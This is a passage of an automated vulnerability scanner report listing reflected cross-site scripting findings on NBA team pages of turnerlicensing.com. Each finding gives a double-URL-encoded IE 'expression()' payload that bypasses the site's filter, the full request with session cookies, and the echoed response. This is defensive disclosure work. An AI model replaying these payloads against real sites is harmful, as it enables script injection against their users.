Set-Cookie: JSESSIONID=1X1FMyVFGZHBK77pY1dKLGbMLs9GyRTdt4s3HfwTv1Hznr2hj3FbXlhJlQJj4Sh1y13v7zvFnwMynp2yS8KHPZBPbchxPGQ92MH14J78rYTrwwS73S8Wyy22cL3kwSyV!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:38:43 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=989
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 71653


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
ng.com/s.nl?sc=69&category=144026&it=A&id=8429&32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da=1&32b5b%27style%3d%27x%3aexpression%28alert%281%29%29%27f3631ec12da=1&32b5b'style='x:expression(alert(1))'f3631ec12da=1&fromsla=T'>
...[SNIP]...

1.15. http://www.turnerlicensing.com/NBA/boston_celtics/8090823 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics/8090823

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1f23'style='x:expression(alert(1))'784b725bfc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics/8090823?d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:51:38 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:51:40 GMT
NS_RTIMER_COMPOSITE: 1327508600:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=5Jp2MyYbhjgvmlWb12J36gTccvMnqyJJL2cG8kKgdMWvG68PSLHyKB9dTtpDXJ5GND22vxMpdpsGjWXlVGQQRDfwlz1wsxyvRT6SnQGHWGpdQ4rks9WQpzhsd1LJ1PL9!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:51:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=943
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70943


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
ng.com/s.nl?sc=69&category=144026&it=A&id=8952&d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1=1&d1f23%27style%3d%27x%3aexpression%28alert%281%29%29%27784b725bfc1=1&d1f23'style='x:expression(alert(1))'784b725bfc1=1&fromsla=T'>
...[SNIP]...

1.16. http://www.turnerlicensing.com/NBA/boston_celtics/8120527 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics/8120527

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f1c8'style='x:expression(alert(1))'13f6993aa6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics/8120527?9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:36:54 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:37:02 GMT
NS_RTIMER_COMPOSITE: -1320057898:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kkbkMyVHyB2XT70K7hfFpTv92JnbclQjTJ9vLRZC3hfcNfKcLpnm8TytlNhXbpZXPh1Fjyh2ymRQ0CLW9fbdT81xHHr03jGyXl4L52QYkNcvc9RVjTv1zMpTG1Q0X42t!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:38:51 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70997


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
ng.com/s.nl?sc=69&category=144026&it=A&id=9050&9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f=1&9f1c8%27style%3d%27x%3aexpression%28alert%281%29%29%2713f6993aa6f=1&9f1c8'style='x:expression(alert(1))'13f6993aa6f=1&fromsla=T'>
...[SNIP]...

1.17. http://www.turnerlicensing.com/NBA/boston_celtics/8190305 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics/8190305

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 500ef'style='x:expression(alert(1))'130e322f0ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics/8190305?500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:52:13 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:52:14 GMT
NS_RTIMER_COMPOSITE: -1331748698:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=TCh2MyYdMnTFJlWR6pnGsH2ZJPsxJK8NvPpVKrbvDTXgrQQQBtPypNnMCGSQh0G6JW2D2QnJ9SnVBjzwY0q5vhTDGgkdw0dxLnyYCTrlvMhRnXrnmFR7j5FwQshJKvNy!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:52:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=873
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 71103


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144026&it=A&id=4122&500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba=1&500ef'style='x:expression(alert(1))'130e322f0ba=1&500ef%27style%3d%27x%3aexpression%28alert%281%29%29%27130e322f0ba=1&fromsla=T'>
...[SNIP]...

1.18. http://www.turnerlicensing.com/NBA/charlotte_bobcats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/charlotte_bobcats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f09'style='x:expression(alert(1))'8b7d15cb754 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/charlotte_bobcats?92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:12 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:16 GMT
NS_RTIMER_COMPOSITE: -1254882818:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=NGgDMyTXnvrpvNzPgTnJJtWmg2TDJD5dmGP872vG4fjdfTJ2G2ZkWhQpWn3ghLmY5BTt0m8WdBwljh2NQ1YQl7bPCCZDT55XNtyNnqTbp2Kgy11y4Qx3wdJQ42pmC7QV!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=915
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 67557


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Charlotte Bobcats</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144031&92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754=1&92f09'style='x:expression(alert(1))'8b7d15cb754=1&92f09%27style%3d%27x%3aexpression%28alert%281%29%29%278b7d15cb754=1&fromsla=T'>
...[SNIP]...

1.19. http://www.turnerlicensing.com/NBA/chicago_bulls [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/chicago_bulls

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da662'style='x:expression(alert(1))'3336b5f603a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/chicago_bulls?da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:27 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:31 GMT
NS_RTIMER_COMPOSITE: 778911622:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=Qx0hMyTGtTwYdyGRbyzkbfL4r1n10p9BbslYz2pxyK2nVv2CwByzC4H2MSgrDv4LDMykntNwQ0ndnHGNmGSGCX8sKZK7qyvyJTWGjvkh12ZDMkTJX90Dn237n5rgK9yz!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:37 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=883
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89369


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Chicago Bulls</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
nsing.com/s.nl?sc=69&category=144054&da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a=1&da662%27style%3d%27x%3aexpression%28alert%281%29%29%273336b5f603a=1&fromsla=T&da662'style='x:expression(alert(1))'3336b5f603a=1'>
...[SNIP]...

1.20. http://www.turnerlicensing.com/NBA/cleveland_cavaliers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/cleveland_cavaliers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4e5e'style='x:expression(alert(1))'5644fd14a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/cleveland_cavaliers?b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:07 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:12 GMT
NS_RTIMER_COMPOSITE: 1114549044:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=KnzFMyTTtxyv1nxjqBJZh2QQJTBt39mVBbncJ011dKT9dHJqyl5vhpzhqf632Q1pFQhr1QCGN5C77LCzffnvHPvnGJ7mnyJFMbDRBxNbvCfyNvDzvhBvZ6GbS00D854l!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:15 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=945
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 62166


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Cleveland Cavaliers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144057&b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b=1&b4e5e'style='x:expression(alert(1))'5644fd14a6b=1&b4e5e%27style%3d%27x%3aexpression%28alert%281%29%29%275644fd14a6b=1&fromsla=T'>
...[SNIP]...

1.21. http://www.turnerlicensing.com/NBA/dallas_mavericks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/dallas_mavericks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c38c9'style='x:expression(alert(1))'c73db034778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/dallas_mavericks?c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:23 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:27 GMT
NS_RTIMER_COMPOSITE: 2002356956:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=vzb8MyTDcNhgpcwrQpTNBvq71X1p6dKycnT441hktf7hpRrGYwyTKnBnFc8GhHkCD6C65XhbnrL2Jct7TNkpGvjKFTS6nycfQxZXn9pcXkhN3XtQ9BQGhJncHFQSz7kT!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:33 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=830
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100420


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Dallas Mavericks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</s
...[SNIP]...
nsing.com/s.nl?sc=69&category=144059&c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778=1&c38c9%27style%3d%27x%3aexpression%28alert%281%29%29%27c73db034778=1&fromsla=T&c38c9'style='x:expression(alert(1))'c73db034778=1'>
...[SNIP]...

1.22. http://www.turnerlicensing.com/NBA/dallas_mavericks/8190309 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/dallas_mavericks/8190309

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41098'style='x:expression(alert(1))'95b3a398db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/dallas_mavericks/8190309?41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:51:40 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:51:44 GMT
NS_RTIMER_COMPOSITE: -354423167:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=J3pLMyYp77mGqTyQf3kGCn61ql5M8lpnQzQzKQmfQ0fhysK6kjw9zqyJpyKrJ6qJdQJqQ5JbTHmLkhTvxQZTMgGfHz64161PpybtGyzxpnF19106cv452QdLzs2XQh3S!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:51:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 71113


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Dallas Mavericks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144059&it=A&id=4126&41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6=1&41098'style='x:expression(alert(1))'95b3a398db6=1&fromsla=T&41098%27style%3d%27x%3aexpression%28alert%281%29%29%2795b3a398db6=1'>
...[SNIP]...

1.23. http://www.turnerlicensing.com/NBA/denver_nuggets [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/denver_nuggets

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fecb4'style='x:expression(alert(1))'9aff6941ac8 in the application's response.

